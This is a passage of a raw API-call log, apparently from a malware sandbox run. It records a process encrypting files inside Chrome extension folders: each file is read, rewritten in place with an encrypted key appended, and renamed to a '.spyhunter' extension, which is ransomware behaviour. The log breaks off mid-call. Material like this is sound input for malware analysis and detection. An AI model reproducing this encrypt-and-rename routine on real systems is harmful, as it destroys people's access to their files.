[0135.856] GetProcessHeap () returned 0x2c0000 [0135.856] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0135.856] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf320*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf320*=0x30) returned 1 [0135.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.037] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json") returned 156 [0136.037] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.038] GetProcessHeap () returned 0x2c0000 [0136.038] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.038] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf2e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf2e4*=0x152, lpOverlapped=0x0) returned 1 [0136.039] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffffeae, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.039] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x152, lpNumberOfBytesWritten=0x25cf2e4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf2e4*=0x152, lpOverlapped=0x0) returned 1 [0136.039] GetProcessHeap () returned 0x2c0000 [0136.040] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.040] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.040] WriteFile (in: hFile=0x180, lpBuffer=0x25cf324*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf2e4, lpOverlapped=0x0 | out: lpBuffer=0x25cf324*, lpNumberOfBytesWritten=0x25cf2e4*=0x4, lpOverlapped=0x0) returned 1 [0136.040] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf2e4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf2e4*=0x30, lpOverlapped=0x0) returned 1 [0136.040] CloseHandle (hObject=0x180) returned 1 [0136.040] GetProcessHeap () returned 0x2c0000 [0136.040] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f4cd10 [0136.040] wnsprintfW (in: pszDest=0x2f4cd10, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.spyhunter") returned 166 [0136.040] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ru\\messages.json.spyhunter")) returned 1 [0136.041] GetProcessHeap () returned 0x2c0000 [0136.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f4cd10 | out: hHeap=0x2c0000) returned 1 [0136.041] GetProcessHeap () returned 0x2c0000 [0136.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.041] GetProcessHeap () returned 0x2c0000 [0136.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f298 | out: hHeap=0x2c0000) returned 1 [0136.042] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf320 | out: pbBuffer=0x25cf320) returned 1 [0136.042] GetProcessHeap () returned 0x2c0000 [0136.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.042] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf318*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf318*=0x30) returned 1 [0136.042] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.042] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json") returned 143 [0136.042] StrStrW (lpFirst="manifest.json", lpSrch=".txt") returned 0x0 [0136.042] GetProcessHeap () returned 0x2c0000 [0136.042] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.043] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf2dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf2dc*=0x2d6, lpOverlapped=0x0) returned 1 [0136.208] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffffd2a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.208] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2d6, lpNumberOfBytesWritten=0x25cf2dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf2dc*=0x2d6, lpOverlapped=0x0) returned 1 [0136.208] GetProcessHeap () returned 0x2c0000 [0136.208] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.208] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.208] WriteFile (in: hFile=0x180, lpBuffer=0x25cf31c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf2dc, lpOverlapped=0x0 | out: lpBuffer=0x25cf31c*, lpNumberOfBytesWritten=0x25cf2dc*=0x4, lpOverlapped=0x0) returned 1 [0136.208] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf2dc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf2dc*=0x30, lpOverlapped=0x0) returned 1 [0136.209] CloseHandle (hObject=0x180) returned 1 [0136.209] GetProcessHeap () returned 0x2c0000 [0136.209] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.209] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.spyhunter") returned 153 [0136.209] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\manifest.json.spyhunter")) returned 1 [0136.209] GetProcessHeap () returned 0x2c0000 [0136.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.209] GetProcessHeap () returned 0x2c0000 [0136.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.209] GetProcessHeap () returned 0x2c0000 [0136.209] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff3ea8 | out: hHeap=0x2c0000) returned 1 [0136.211] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf318 | out: pbBuffer=0x25cf318) returned 1 [0136.211] GetProcessHeap () returned 0x2c0000 [0136.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.211] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf310*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf310*=0x30) returned 1 [0136.211] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.211] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json") returned 155 [0136.211] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.211] GetProcessHeap () returned 0x2c0000 [0136.211] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.211] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf2d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf2d4*=0xfe, lpOverlapped=0x0) returned 1 [0136.212] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff02, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.212] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xfe, lpNumberOfBytesWritten=0x25cf2d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf2d4*=0xfe, lpOverlapped=0x0) returned 1 [0136.212] GetProcessHeap () returned 0x2c0000 [0136.212] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.212] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.213] WriteFile (in: hFile=0x180, lpBuffer=0x25cf314*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf2d4, lpOverlapped=0x0 | out: lpBuffer=0x25cf314*, lpNumberOfBytesWritten=0x25cf2d4*=0x4, lpOverlapped=0x0) returned 1 [0136.213] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf2d4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf2d4*=0x30, lpOverlapped=0x0) returned 1 [0136.213] CloseHandle (hObject=0x180) returned 1 [0136.213] GetProcessHeap () returned 0x2c0000 [0136.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.213] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.spyhunter") returned 165 [0136.213] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\ar\\messages.json.spyhunter")) returned 1 [0136.213] GetProcessHeap () returned 0x2c0000 [0136.213] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.214] GetProcessHeap () returned 0x2c0000 [0136.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.214] GetProcessHeap () returned 0x2c0000 [0136.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7f298 | out: hHeap=0x2c0000) returned 1 [0136.214] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf318 | out: pbBuffer=0x25cf318) returned 1 [0136.214] GetProcessHeap () returned 0x2c0000 [0136.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.214] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf310*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf310*=0x30) returned 1 [0136.214] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.214] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json") returned 160 [0136.214] StrStrW (lpFirst="computed_hashes.json", lpSrch=".txt") returned 0x0 [0136.214] GetProcessHeap () returned 0x2c0000 [0136.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.214] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf2d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf2d4*=0x160, lpOverlapped=0x0) returned 1 [0136.215] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xfffffea0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.215] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x25cf2d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf2d4*=0x160, lpOverlapped=0x0) returned 1 [0136.215] GetProcessHeap () returned 0x2c0000 [0136.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.216] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.216] WriteFile (in: hFile=0x180, lpBuffer=0x25cf314*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf2d4, lpOverlapped=0x0 | out: lpBuffer=0x25cf314*, lpNumberOfBytesWritten=0x25cf2d4*=0x4, lpOverlapped=0x0) returned 1 [0136.216] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf2d4, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf2d4*=0x30, lpOverlapped=0x0) returned 1 [0136.216] CloseHandle (hObject=0x180) returned 1 [0136.216] GetProcessHeap () returned 0x2c0000 [0136.216] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.216] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.spyhunter") returned 170 [0136.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\computed_hashes.json.spyhunter")) returned 1 [0136.217] GetProcessHeap () returned 0x2c0000 [0136.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.217] GetProcessHeap () returned 0x2c0000 [0136.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.217] GetProcessHeap () returned 0x2c0000 [0136.217] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc6d20 | out: hHeap=0x2c0000) returned 1 [0136.218] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf310 | out: pbBuffer=0x25cf310) returned 1 [0136.218] GetProcessHeap () returned 0x2c0000 [0136.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.218] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf308*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf308*=0x30) returned 1 [0136.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.219] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json") returned 155 [0136.219] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.219] GetProcessHeap () returned 0x2c0000 [0136.219] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.219] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf2cc*=0xda, lpOverlapped=0x0) returned 1 [0136.220] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0xffffff26, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0136.220] WriteFile (in: hFile=0x180, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xda, lpNumberOfBytesWritten=0x25cf2cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf2cc*=0xda, lpOverlapped=0x0) returned 1 [0136.220] GetProcessHeap () returned 0x2c0000 [0136.220] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0136.220] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0136.221] WriteFile (in: hFile=0x180, lpBuffer=0x25cf30c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf2cc, lpOverlapped=0x0 | out: lpBuffer=0x25cf30c*, lpNumberOfBytesWritten=0x25cf2cc*=0x4, lpOverlapped=0x0) returned 1 [0136.221] WriteFile (in: hFile=0x180, lpBuffer=0x31f278*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf2cc, lpOverlapped=0x0 | out: lpBuffer=0x31f278*, lpNumberOfBytesWritten=0x25cf2cc*=0x30, lpOverlapped=0x0) returned 1 [0136.221] CloseHandle (hObject=0x180) returned 1 [0136.221] GetProcessHeap () returned 0x2c0000 [0136.221] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f5cd58 [0136.221] wnsprintfW (in: pszDest=0x2f5cd58, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.spyhunter") returned 165 [0136.221] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sl\\messages.json.spyhunter")) returned 1 [0136.222] GetProcessHeap () returned 0x2c0000 [0136.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5cd58 | out: hHeap=0x2c0000) returned 1 [0136.222] GetProcessHeap () returned 0x2c0000 [0136.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0136.222] GetProcessHeap () returned 0x2c0000 [0136.222] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7ef88 | out: hHeap=0x2c0000) returned 1 [0136.223] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf308 | out: pbBuffer=0x25cf308) returned 1 [0136.223] GetProcessHeap () returned 0x2c0000 [0136.223] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0136.224] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x25cf300*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x25cf300*=0x30) returned 1 [0136.224] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0136.224] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sk\\messages.json") returned 155 [0136.224] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0136.224] GetProcessHeap () returned 0x2c0000 [0136.224] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0136.224] ReadFile (in: hFile=0x180, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf2c4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, 